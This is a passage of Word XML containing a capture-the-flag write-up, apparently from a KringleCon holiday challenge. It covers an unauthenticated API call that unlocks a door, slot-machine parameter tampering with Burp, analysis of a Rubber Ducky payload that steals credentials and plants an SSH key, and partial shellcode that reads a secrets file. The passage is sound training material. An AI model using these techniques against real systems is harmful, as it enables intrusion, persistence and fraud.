      <w:r>
        <w:t xml:space="preserve">By walking up to the window and opening the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USB dongle, we can detect the open SSID “FROST-Nidus-Setup” via the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>iwlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r>
        <w:t>” command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314D35F" w14:textId="489FDEFF" w:rsidR="00A82F86" w:rsidRDefault="00A82F86">
      <w:r>
        <w:t>To connect, we run the following command referencing our network interface: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> wlan0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>essid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROST-Nidus-Setup</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07987F33" w14:textId="113DEEFB" w:rsidR="00570253" w:rsidRDefault="00A82F86">
      <w:r>
        <w:t xml:space="preserve">When successfully connected, the terminal points to a setup utility at </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:t>http://nidus-setup:8080</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDAA65" w14:textId="4C12AB7E" w:rsidR="00A82F86" w:rsidRDefault="00A82F86">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="0094724D">
          <w:rPr>
            <w:rStyle w:val="CodeInlineChar"/>
          </w:rPr>
          <w:t>http://nidus-setup:8000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">” provides a response with instructions on using the API documented at </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:t>http://nidus-setup:8000/apidoc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3451FEAA" w14:textId="0349DF1D" w:rsidR="00A82F86" w:rsidRDefault="00A82F86">
      <w:r>
        <w:t xml:space="preserve">There are several API endpoints available, but all of them require </w:t>
      </w:r>
      <w:r w:rsidR="007907FF">
        <w:t>registration of the device except fo</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="007907FF">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007907FF">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007907FF">
        <w:t>/cooler. There is also an important warning: do not set the temperature above 0 as it may “melt important furniture.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38675D09" w14:textId="05ABC028" w:rsidR="007907FF" w:rsidRDefault="007907FF">
      <w:r>
        <w:t>Since the cooler is the only unregistered endpoint available, we review the syntax for interacting with the cooler. It takes the temperature in json format, sent to the endpoint via POST. We can modify an example provided by the API to send a new temperature to the cooler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372418BC" w14:textId="0DBE7454" w:rsidR="007907FF" w:rsidRDefault="007907FF">
      <w:r>
        <w:t xml:space="preserve">A command that works to unlock the door is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81642D" w14:textId="4EEA53B8" w:rsidR="007907FF" w:rsidRPr="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="007907FF" w:rsidRPr="0094724D">
        <w:t>url -XPOST -H ‘Content-Type: application/json’ –data-binary ‘{“temperature”: 2}’ http://nidus-setup:8000/api/cooler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC34D3B" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D"/>
    <w:p w14:paraId="45633BF1" w14:textId="452FEDD1" w:rsidR="007907FF" w:rsidRDefault="007907FF">
      <w:r>
        <w:t>If successful, the endpoint will send back a response with current environment information like the temperature and humidity. If the temperature was set high enough, it will also include a warning: ICE MELT DETECTED!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43B3BD" w14:textId="1CBD26B4" w:rsidR="007907FF" w:rsidRDefault="007907FF">
      <w:r>
        <w:t>This successfully unlocks the frozen in front of Frost Tower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C076A1" w14:textId="50D5DE5A" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 4 – Slot Machine Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0804A534" w14:textId="77777777" w:rsidR="0033043D" w:rsidRDefault="0033043D" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>This objective asks us to discover what the Jack Frost Tower casino security will threaten to do when our coin total exceeds 1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB00747" w14:textId="77777777" w:rsidR="00E923BF" w:rsidRDefault="0033043D" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When entering the slots room, Hubris </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Selfington</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is found off to the left complaining about a slot machine that has been paying out too much</w:t>
      </w:r>
      <w:r w:rsidR="00E923BF">
        <w:t>, making it the perfect starting point to figure out a way to get on Jack Frost Tower casino security’s bad side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0277E0" w14:textId="77777777" w:rsidR="00E923BF" w:rsidRDefault="00E923BF" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additionally, having asked around, Noel Boetie suggested that the slots are susceptible to parameter tampering. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923025F" w14:textId="77777777" w:rsidR="00E923BF" w:rsidRDefault="00E923BF" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>To solve the challenge, I initially just played a few rounds to see if there was any kind of discernable pattern for winning spins, since Hubris suggested this slot machine was paying out too much/too often. I thought that if there was a pattern, I could bet low on losing spins and bet high on known upcoming winning spins. This was not successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC4C20" w14:textId="77777777" w:rsidR="006E5000" w:rsidRDefault="00E923BF" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With Noel’s suggestion in hand, I opened the slot interface in </w:t>
      </w:r>
      <w:r w:rsidR="006E5000">
        <w:t>a browser configured with Burp Proxy to understand what parameters were being sent each spin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5E0520" w14:textId="77777777" w:rsidR="006E5000" w:rsidRDefault="006E5000" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Each spin sends the following parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65D7CF" w14:textId="0E9A920A" w:rsidR="006E5000" w:rsidRDefault="006E5000" w:rsidP="006E5000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>betamount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00427C35">
        <w:t>corresponding to the “bet level”</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F5A12" w14:textId="6549A579" w:rsidR="006E5000" w:rsidRDefault="006E5000" w:rsidP="006E5000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>numline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00427C35">
        <w:t>not configurable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EAD13C" w14:textId="1034050B" w:rsidR="006E5000" w:rsidRDefault="006E5000" w:rsidP="006E5000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (bet size multiplier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966A827" w14:textId="5E50287E" w:rsidR="00853B73" w:rsidRDefault="006E5000" w:rsidP="006E5000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The response </w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>includes several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> variables, </w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the total credits for this session.</w:t>
      </w:r>
      <w:r w:rsidR="0033043D">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="379EA301" w14:textId="759A83C4" w:rsidR="0033043D" w:rsidRDefault="006E5000" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Initiall</w:t>
      </w:r>
      <w:r w:rsidR="00427C35">
        <w:t>y, I attempted to send the credits as a new parameter—but this did not do anything to change the credit total on the server side. Sending other parameters not included in the request, like ‘jackpot,’ also did not affect the game.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDF2BC" w14:textId="3A6EED12" w:rsidR="00427C35" w:rsidRDefault="00427C35" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By using Burp Repeater to continuously send spin requests, it made it easier to tweak the parameters. First, I attempted to play a spin with more credits than I owned. This did not work. Since each spin typically subtracted credits, I wondered what would happen if the server received a negative bet amount. Would it increment my score? No—apparently the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>betamount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> field is validated and must be positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEB6CE" w14:textId="344A1731" w:rsidR="00427C35" w:rsidRDefault="00427C35" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>numline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is not validated. By setting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>numline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to a negative -20 instead of the default value of 20, I noticed my credits going up after every failed spin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19687C02" w14:textId="29F00BD3" w:rsidR="00427C35" w:rsidRDefault="00427C35" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By gradually </w:t>
      </w:r>
      <w:r w:rsidR="00DE7AF9">
        <w:t>increasing the amount of each bet as my credits pile grew, I shortly reached over 1000 credits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790258C5" w14:textId="07A7B83A" w:rsidR="00DE7AF9" w:rsidRDefault="00DE7AF9" w:rsidP="0033043D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3705"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The casino security warns in the server response for any spin with credits over 1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7AF9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7AF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“I'm going to have some bouncer trolls bounce you right out of this casino!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420F009B" w14:textId="0F9823AD" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 5 – Strange USB Device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A99E6" w14:textId="45E51774" w:rsidR="00853B73" w:rsidRDefault="00DE7AF9">
      <w:r>
        <w:t xml:space="preserve">In the Speaker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UNPreparation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Room, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Morcel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Nougat has a strange USB device that needs to be analyzed. To solve the challenge, we need to discover the username of the troll involved with the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3C0CD" w14:textId="227BBC6D" w:rsidR="00DE7AF9" w:rsidRDefault="00DE7AF9">
      <w:r>
        <w:t xml:space="preserve">The device is available at </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/USBDEVICE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and contains a single file, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>inject.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD6AA3">
        <w:t xml:space="preserve"> Jewel Loggins provides tips for this challenge and tells us about Ducky Script, a way to code USB devices like we’re investigating to take automated actions on a host. It just so happens that Ducky Scripts are typically encoded as an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD6AA3" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>inject.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD6AA3">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF86B53" w14:textId="4EC3419B" w:rsidR="00AD6AA3" w:rsidRDefault="00AD6AA3">
      <w:r>
        <w:t>Checking the terminal, there is a script called “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>mallard.py</w:t>
      </w:r>
      <w:r>
        <w:t>.” Examining the script it appears to be related to USB Rubber Duckies. Running the script with no parameters includes context that it is used to analyze ducky files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8B01A" w14:textId="509FA67C" w:rsidR="00AD6AA3" w:rsidRDefault="00AD6AA3">
      <w:r>
        <w:t xml:space="preserve">Running </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mallard.py </w:t>
      </w:r>
      <w:r w:rsidR="0094724D" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>file /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/USBDEVICE/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>inject.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will output the raw ducky code to the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E36866" w14:textId="163A2CD4" w:rsidR="00AD6AA3" w:rsidRDefault="00BA2406">
      <w:r>
        <w:t>The script appears to steal credentials and send output to a malicious trollfun.jackfrosttower.com service on port 1337.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6837A" w14:textId="17C2C37B" w:rsidR="00BA2406" w:rsidRDefault="00BA2406">
      <w:r>
        <w:t>There is a long base64 encoded string at the bottom. However, it is not usable because it is in</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reverse. In fact, the full command outputs the string, pipes it to the reverse command, decodes it, then pipes it to bash to run a malicious command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E4A75" w14:textId="07BFD87D" w:rsidR="00BA2406" w:rsidRDefault="00BA2406">
      <w:r>
        <w:t>By copying the command up to the pipe to bash and executing it, we can review what would be sent to bash</w:t>
      </w:r>
      <w:r w:rsidR="006B6779">
        <w:t xml:space="preserve">. The command uses echo to print out an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6779">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6779">
        <w:t xml:space="preserve"> public key and then has it appended to </w:t>
      </w:r>
      <w:r w:rsidR="006B6779" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6779" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6779" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6779" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6779">
        <w:t xml:space="preserve">. This will allow the troll associated with the public key, which appears to be </w:t>
      </w:r>
      <w:r w:rsidR="006B6779" w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ickymcgoop@trollfun.jackfrosttower.com</w:t>
      </w:r>
      <w:r w:rsidR="006B6779" w:rsidRPr="006B6779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006B6779">
        <w:t xml:space="preserve"> to access this account via SSH with their private key without the need to know any credentials for the victim. This solution also survives password resets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5276A8A1" w14:textId="77EAF0BC" w:rsidR="006B6779" w:rsidRDefault="006B6779">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To solve the challenge, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ickymcgoop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” needs to be submitted in the top window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B546B" w14:textId="019837A0" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 6 – Shellcode Primer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F4B09" w14:textId="54F1D3E8" w:rsidR="00853B73" w:rsidRDefault="006B6779">
      <w:r>
        <w:t xml:space="preserve">To solve this objective, we need to complete the Shellcode Primer challenge to answer “what is the secret to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> success?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B4173" w14:textId="5D3DB652" w:rsidR="006B6779" w:rsidRDefault="006B6779">
      <w:r>
        <w:t xml:space="preserve">The Shellcode Primer challenge serves as a brief tutorial on writing shellcode snippets. The walkthrough provides information on loops, returning values, using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscalls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00284E5F">
        <w:t xml:space="preserve">managing the stack, and opening a file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238844A1" w14:textId="5A11C052" w:rsidR="00284E5F" w:rsidRDefault="00284E5F">
      <w:r>
        <w:t>At the end of the challenge, we’re tasked with reading the file “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/var/northpolesecrets.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760BFC80" w14:textId="76B5EFAC" w:rsidR="00284E5F" w:rsidRDefault="00284E5F">
      <w:r>
        <w:t>The following shellcode accomplishes this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F97AD6" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>; TODO: Get a reference to this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA4860" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>np_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58E73C40" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> '/var/northpolesecrets.txt',0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF57FD" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>np_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF5E9A" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B3CFDAD" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">; TODO: Call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys_open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DDCDDD7" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rax,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D377505" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi,rbx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63911AA7" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
